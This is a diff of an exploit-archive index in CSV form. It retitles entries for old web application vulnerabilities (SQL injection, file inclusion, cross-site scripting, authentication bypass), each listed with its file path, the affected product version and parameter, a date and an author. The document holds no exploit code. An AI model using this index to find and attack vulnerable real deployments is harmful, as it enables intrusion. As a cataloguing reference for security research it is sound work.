 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0
 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0
-8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' SQL Injection",2009-05-29,Br0ly,php,webapps,0
+8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - 'maincatid' Parameter SQL Injection",2009-05-29,Br0ly,php,webapps,0
 8830,platforms/php/webapps/8830.txt,"Million Dollar Text Links 1.0 - 'id' SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0
@@ -21147,7 +21160,7 @@ id,file,description,date,author,platform,type,port
 9049,platforms/php/webapps/9049.txt,"DM FileManager 3.9.4 - Remote File Disclosure",2009-06-30,Stack,php,webapps,0
 9050,platforms/php/webapps/9050.pl,"SMF Mod Member Awards 1.0.2 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
 9051,platforms/php/webapps/9051.txt,"jax formmailer 3.0.0 - Remote File Inclusion",2009-06-30,ahmadbady,php,webapps,0
-9052,platforms/php/webapps/9052.txt,"BigACE CMS 2.6 - (cmd) Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
+9052,platforms/php/webapps/9052.txt,"BigACE 2.6 - 'cmd' Parameter Local File Inclusion",2009-06-30,CWD@rBe,php,webapps,0
 9053,platforms/php/webapps/9053.txt,"phpMyBlockchecker 1.0.0055 - Insecure Cookie Handling",2009-06-30,SirGod,php,webapps,0
 9054,platforms/php/webapps/9054.txt,"WordPress Plugin Related Sites 2.1 - Blind SQL Injection",2009-06-30,eLwaux,php,webapps,0
 9055,platforms/php/webapps/9055.pl,"PunBB Affiliates Mod 1.1 - Blind SQL Injection",2009-06-30,Dante90,php,webapps,0
@@ -21195,7 +21208,7 @@ id,file,description,date,author,platform,type,port
 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0
 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0
 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0
-9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
+9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0
 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0
@@ -21367,7 +21380,7 @@ id,file,description,date,author,platform,type,port
 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0
 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusion",2009-08-18,jetli007,php,webapps,0
 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0
-9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - (store.php id) SQL Injection",2009-08-18,NoGe,php,webapps,0
+9447,platforms/php/webapps/9447.pl,"AJ Auction Pro OOPD 2.x - 'id' Parameter SQL Injection",2009-08-18,NoGe,php,webapps,0
 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0
 9451,platforms/php/webapps/9451.txt,"DreamPics Builder - (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
@@ -21569,8 +21582,8 @@ id,file,description,date,author,platform,type,port
 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0
 9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0
 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0
-9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - store() SQL Injection",2009-10-26,bookoo,php,webapps,0
-9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - post.php SQL Injection",2009-10-26,bookoo,php,webapps,0
+9964,platforms/php/webapps/9964.txt,"RunCMS 2m1 - 'store()' SQL Injection",2009-10-26,bookoo,php,webapps,0
+9965,platforms/php/webapps/9965.txt,"RunCMS 2ma - 'post.php' SQL Injection",2009-10-26,bookoo,php,webapps,0
 9967,platforms/asp/webapps/9967.txt,"SharePoint 2007 - Team Services Source Code Disclosure",2009-10-26,"Daniel Martin",asp,webapps,0
 33434,platforms/windows/webapps/33434.rb,"HP Release Control - Authenticated XXE (Metasploit)",2014-05-19,"Brandon Perry",windows,webapps,80
 9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",hardware,webapps,80
@@ -23604,7 +23617,7 @@ id,file,description,date,author,platform,type,port
 14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps,0
 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0
-14354,platforms/php/webapps/14354.txt,"AJ Article - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
+14354,platforms/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
 14356,platforms/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps,0
 14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps,0
 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps,0
@@ -25586,7 +25599,7 @@ id,file,description,date,author,platform,type,port
 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
-21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
+21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0
 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0
 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0
 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@@ -27972,7 +27985,7 @@ id,file,description,date,author,platform,type,port
 26182,platforms/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-08-20,bl2k,php,webapps,0
 26183,platforms/php/webapps/26183.txt,"NEPHP 3.0.4 - browse.php Cross-Site Scripting",2005-08-22,bl2k,php,webapps,0
 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,php,webapps,0
-26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Newbb_plus and Messages Modules - Multiple SQL Injections",2005-08-22,"James Bercegay",php,webapps,0
+26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",php,webapps,0
 26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
 26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0
@@ -28583,7 +28596,7 @@ id,file,description,date,author,platform,type,port
 26962,platforms/php/webapps/26962.txt,"PHPSlash 0.8.1 - article.php SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0
 26963,platforms/asp/webapps/26963.txt,"Quantum Art QP7.Enterprise - news_and_events_new.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
 26964,platforms/asp/webapps/26964.txt,"Quantum Art QP7.Enterprise - news.asp p_news_id Parameter SQL Injection",2005-12-21,r0t3d3Vil,asp,webapps,0
-26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - Type Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
+26965,platforms/php/webapps/26965.txt,"MusicBox 2.3 - 'type' Parameter SQL Injection",2005-12-22,"Medo HaCKer",php,webapps,0
 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0
 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0
 26972,platforms/jsp/webapps/26972.txt,"oracle Application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0
@@ -28651,7 +28664,7 @@ id,file,description,date,author,platform,type,port
 27357,platforms/php/webapps/27357.txt,"Simplog 1.0.2 - Information Disclosure",2006-03-04,Retard,php,webapps,0
 27358,platforms/php/webapps/27358.txt,"DVGuestbook 1.0/1.2.2 - 'index.php' page Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
 27359,platforms/php/webapps/27359.txt,"DVGuestbook 1.0/1.2.2 - dv_gbook.php f Parameter Cross-Site Scripting",2006-03-06,Liz0ziM,php,webapps,0
-27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - Bigshow.php Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
+27360,platforms/php/webapps/27360.txt,"RunCMS 1.x - 'Bigshow.php' Cross-Site Scripting",2006-03-06,"Roozbeh Afrasiabi",php,webapps,0
 27042,platforms/ios/webapps/27042.txt,"Photo Server 2.0 iOS - Multiple Vulnerabilities",2013-07-23,Vulnerability-Lab,ios,webapps,0
 27048,platforms/php/webapps/27048.txt,"AppServ Open Project 2.4.5 - Remote File Inclusion",2006-01-09,Xez,php,webapps,0
 27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -28788,7 +28801,7 @@ id,file,description,date,author,platform,type,port
 27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
 27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
 27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0
-27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
+27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - 'PMLite.php' SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0
 27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0
 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0
@@ -28809,7 +28822,7 @@ id,file,description,date,author,platform,type,port
 27252,platforms/php/webapps/27252.txt,"CuteNews 1.4.1 - show_news.php Cross-Site Scripting",2006-02-20,imei,php,webapps,0
 27254,platforms/php/webapps/27254.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter Cross-Site Scripting",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
 27255,platforms/php/webapps/27255.txt,"PostNuke 0.6x/0.7x NS-Languages Module - language Parameter SQL Injection",2006-02-21,"Maksymilian Arciemowicz",php,webapps,0
-27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - Ratefile.php Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
+27256,platforms/php/webapps/27256.txt,"RunCMS 1.x - 'Ratefile.php' Cross-Site Scripting",2006-02-22,"Roozbeh Afrasiabi",php,webapps,0
 27259,platforms/php/webapps/27259.txt,"Noah's Classifieds 1.0/1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,trueend5,php,webapps,0
 27260,platforms/php/webapps/27260.txt,"Noah's Classifieds 1.0/1.3 - Search Page SQL Injection",2006-02-22,trueend5,php,webapps,0
 27261,platforms/php/webapps/27261.txt,"Noah's Classifieds 1.0/1.3 - Local File Inclusion",2006-02-22,trueend5,php,webapps,0
@@ -28827,7 +28840,7 @@ id,file,description,date,author,platform,type,port
 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0
 27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang Parameter' SQL Injection",2013-08-02,Raw-x,php,webapps,0
 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0
-27276,platforms/php/webapps/27276.html,"BigACE CMS 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
+27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0
 27279,platforms/php/webapps/27279.txt,"vtiger CRM 5.4.0 (SOAP Services) - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0
 27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - (pages.php page_name Parameter) SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0
 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0
@@ -28941,9 +28954,9 @@ id,file,description,date,author,platform,type,port
 27990,platforms/php/webapps/27990.txt,"Calendar Express 2.2 - month.php SQL Injection",2006-06-07,"CrAzY CrAcKeR",php,webapps,0
 27443,platforms/php/webapps/27443.txt,"Extcalendar 1.0 - Cross-Site Scripting",2006-03-18,Soothackers,php,webapps,0
 27444,platforms/php/webapps/27444.txt,"Woltlab Burning Board 2.3.4 - Class_DB_MySQL.php Cross-Site Scripting",2006-03-18,r57shell,php,webapps,0
-27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
-27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
-27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - cart.php Multiple Parameter Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
+27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0
+27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
+27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0
 27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0
@@ -29516,7 +29529,7 @@ id,file,description,date,author,platform,type,port
 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
 28261,platforms/php/webapps/28261.txt,"RadScripts - a_editpage.php Filename Variable Arbitrary File Overwrite",2006-07-24,INVENT,php,webapps,0
-28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - Page Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
+28262,platforms/php/webapps/28262.txt,"MusicBox 2.3.4 - 'page' Parameter SQL Injection",2006-07-24,"EllipSiS Security",php,webapps,0
 28264,platforms/php/webapps/28264.txt,"Prince Clan Chess Club 0.8 - Include.PCchess.php Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0
 28267,platforms/php/webapps/28267.txt,"LinksCaffe 3.0 - links.php Multiple Parameter SQL Injection",2006-07-25,simo64,php,webapps,0
 28268,platforms/php/webapps/28268.txt,"LinksCaffe 3.0 - counter.php tablewidth Parameter Cross-Site Scripting",2006-07-25,simo64,php,webapps,0
@@ -29586,7 +29599,7 @@ id,file,description,date,author,platform,type,port
 28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
 28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
 28377,platforms/php/webapps/28377.txt,"WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload",2013-09-18,Vulnerability-Lab,php,webapps,0
-28378,platforms/php/webapps/28378.txt,"MyWebland miniBloggie 1.0 - Fname Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
+28378,platforms/php/webapps/28378.txt,"miniBloggie 1.0 - 'Fname' Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
 28379,platforms/php/webapps/28379.txt,"WEBinsta Mailing List Manager 1.3 - Install3.php Remote File Inclusion",2006-08-10,"Philipp Niedziela",php,webapps,0
 28382,platforms/php/webapps/28382.txt,"WordPress Plugin WP-DB Backup 1.6/1.7 - edit.php Directory Traversal",2006-08-14,"marc & shb",php,webapps,0
 28385,platforms/asp/webapps/28385.txt,"BlaBla 4U - Multiple Cross-Site Scripting Vulnerabilities",2006-08-14,Vampire,asp,webapps,0
@@ -29619,10 +29632,10 @@ id,file,description,date,author,platform,type,port
 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - Search_function.php Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
-28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - item_main.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - upload_form.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - download.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
-28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - admin.cmd.php GLOBALS Parameter Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28432,platforms/php/webapps/28432.txt,"BigACE 1.8.2 - 'item_main.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28433,platforms/php/webapps/28433.txt,"BigACE 1.8.2 - 'upload_form.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28434,platforms/php/webapps/28434.txt,"BigACE 1.8.2 - 'download.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
+28435,platforms/php/webapps/28435.txt,"BigACE 1.8.2 - 'admin.cmd.php' Remote File Inclusion",2006-08-26,Vampire,php,webapps,0
 28436,platforms/php/webapps/28436.txt,"Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion",2006-08-26,night_warrior771,php,webapps,0
 28437,platforms/php/webapps/28437.txt,"Joomla! / Mambo Component 'com_comprofiler' 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,php,webapps,0
 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0
@@ -29934,7 +29947,7 @@ id,file,description,date,author,platform,type,port
 28831,platforms/php/webapps/28831.txt,"Simple Machines Forum (SMF) 1.0/1.1 - 'index.php' Cross-Site Scripting",2006-10-19,b0rizQ,php,webapps,0
 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Inclusion",2006-10-19,SuBzErO,php,webapps,0
 28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 - config.php SQL Injection",2006-10-20,G1UK,php,webapps,0
-28838,platforms/php/webapps/28838.txt,"ClanLite - Config-PHP.php Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
+28838,platforms/php/webapps/28838.txt,"ClanLite - 'conf-php.php' Remote File Inclusion",2006-10-23,x_w0x,php,webapps,0
 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 - smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter Cross-Site Scripting",2006-10-23,MP,php,webapps,0
 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 - mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0
 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 - Cat Parameter Cross-Site Scripting",2006-10-23,MC.Iglo,php,webapps,0
@@ -30785,7 +30798,7 @@ id,file,description,date,author,platform,type,port
 29955,platforms/php/webapps/29955.txt,"WF-Quote 1.0 Xoops Module - 'index.php' SQL Injection",2007-05-07,Bulan,php,webapps,0
 29956,platforms/php/webapps/29956.txt,"ObieWebsite Mini Web Shop 2 - order_form.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
 29957,platforms/php/webapps/29957.txt,"ObieWebsite Mini Web Shop 2 - Sendmail.php PATH_INFO Parameter Cross-Site Scripting",2007-05-02,CorryL,php,webapps,0
-29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - PID Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
+29958,platforms/asp/webapps/29958.txt,"FipsCMS 2.1 - 'pid' Parameter SQL Injection",2007-05-07,"ilker Kandemir",asp,webapps,0
 29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal",2013-12-01,"Cesar Neira",hardware,webapps,0
 29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
 29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting",2007-05-07,"John Martinelli",php,webapps,0
@@ -32079,8 +32092,8 @@ id,file,description,date,author,platform,type,port
 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0
 32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
-32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - votepolls.php bbPath[path] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
-32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - config.php bbPath[root_theme] Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32101,platforms/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
 32102,platforms/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Parameter Authentication Bypass",2008-07-21,Ciph3r,php,webapps,0
 32106,platforms/php/webapps/32106.txt,"Claroline 1.8 - learnPath/calendar/myagenda.php Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps,0
@@ -32177,7 +32190,7 @@ id,file,description,date,author,platform,type,port
 32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0
 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0
-32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
+32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0
 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0
 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0
 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0
@@ -33218,9 +33231,9 @@ id,file,description,date,author,platform,type,port
 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80
 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0
 34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0
-34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0
-34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0
